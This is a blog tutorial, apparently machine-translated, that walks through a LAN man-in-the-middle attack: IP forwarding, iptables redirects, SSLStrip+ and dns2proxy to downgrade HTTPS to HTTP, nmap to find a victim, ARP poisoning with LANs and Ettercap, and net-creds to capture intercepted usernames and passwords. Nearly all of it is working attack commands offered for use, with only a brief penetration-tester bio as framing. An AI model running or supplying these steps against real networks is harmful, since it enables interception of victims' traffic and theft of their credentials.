There is a presentation on the use of SSLStrip +  dns2proxy , as well as a few videos from the enthusiast on the subject, but a full step by step instructions on how to do that and I have not found.Therefore, this article fills the gap, here I have tried to the fullest extent and steps describe run SSLStrip + and dns2proxy. I have done testing BlackArch, but the nature of the teams is that they should also work, such as the Kali Linux.

sslstrip-2

During the test I was able to replace HTTPS protocols to HTTP for sites like google.com, yandex.ru, vk.com, failed to facebook.com, mail.ru (others have not tried).

We establish the necessary packages:

sudo pacman -S python2-service-identity ettercap-gtk

Please note, I did not put any of the repositories sslstrip, nor dns2proxy. Since dns2proxy repositories BlackArch absent and sslstrip presented in its normal version (not SSLStrip +).

 

The commands I have performed are logged in as root.

Set your machine to forwarding (forwarding).

1
sudo echo "1" > /proc/sys/net/ipv4/ip_forward

Configure iptables to redirect traffic HTTP:

1
2
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 2000
sudo iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

Download and run SSLStrip +.

1
2
3
git clone https://github.com/singe/sslstrip2.git
cd sslstrip2/
sudo python2 ./sslstrip.py -l 2000

Download and run dns2proxy:

1
2
3
git clone https://github.com/singe/dns2proxy.git
cd dns2proxy/
sudo python2 dns2proxy.py

Then I suffered a setback with arpspoof and LANs . In BlackArch, by the way, it arpspoof called smikims-arpspoof. I for some reason, the team did not work.

On LANs, I did so. Searched IP of the victim:

1
sudo nmap -sn 192.168.1.0/24

And run the program with the following arguments:

1
sudo lans -u -p -d -ip 192.168.1.33 -i enp0s3

In principle, spoofing and sniffing went because using Net-Creds I can see intercepted usernames and passwords, but it is going to bypass SSLStrip + and dns2proxy:

1
sudo net-creds -i enp0s3

By the way, when you exit LANs makes cleaning, ie, may again need to enable forwarding and firewall rules.

Then I decided to use spoofing Ettercap . Made in a classic case:

Run the graphical user interface ( -G ):

1
sudo ettercap -G

In the menu, choose Sniff, hereinafter Unified, select the desired interface:

Now select Hosts, there subparagraph Scan for hosts. After scanning, select the Hosts list.

As goals1 select Router (Add to Target 1), as goals2 select the device that will attack (Add to Target 2).

Now go to step Mitm menu. There select ARP poisoning … Tick on Sniff remote connections.

At this point I stopped, because SSLStrip + and dns2proxy earned. Though obviously worked SSLStrip + (lowered protocol to HTTP), but errors constantly appear in the program window – perhaps this is normal behavior.

About The Author

I am Ethical Hacker, Penetration tester, and Security Professional. I am an OWASP International Member. I have previously experience to work with Big corporate, Government and well-funded startups. My Company SECUPENT () is multiple award winning Cyber Security and Outsourcing Company. I am not only can save you from known vulnerabilities, also can protect you from 0day exploits and attacks from 3rd party threats.

Related Posts

Leave a Reply

Your email address will not be published.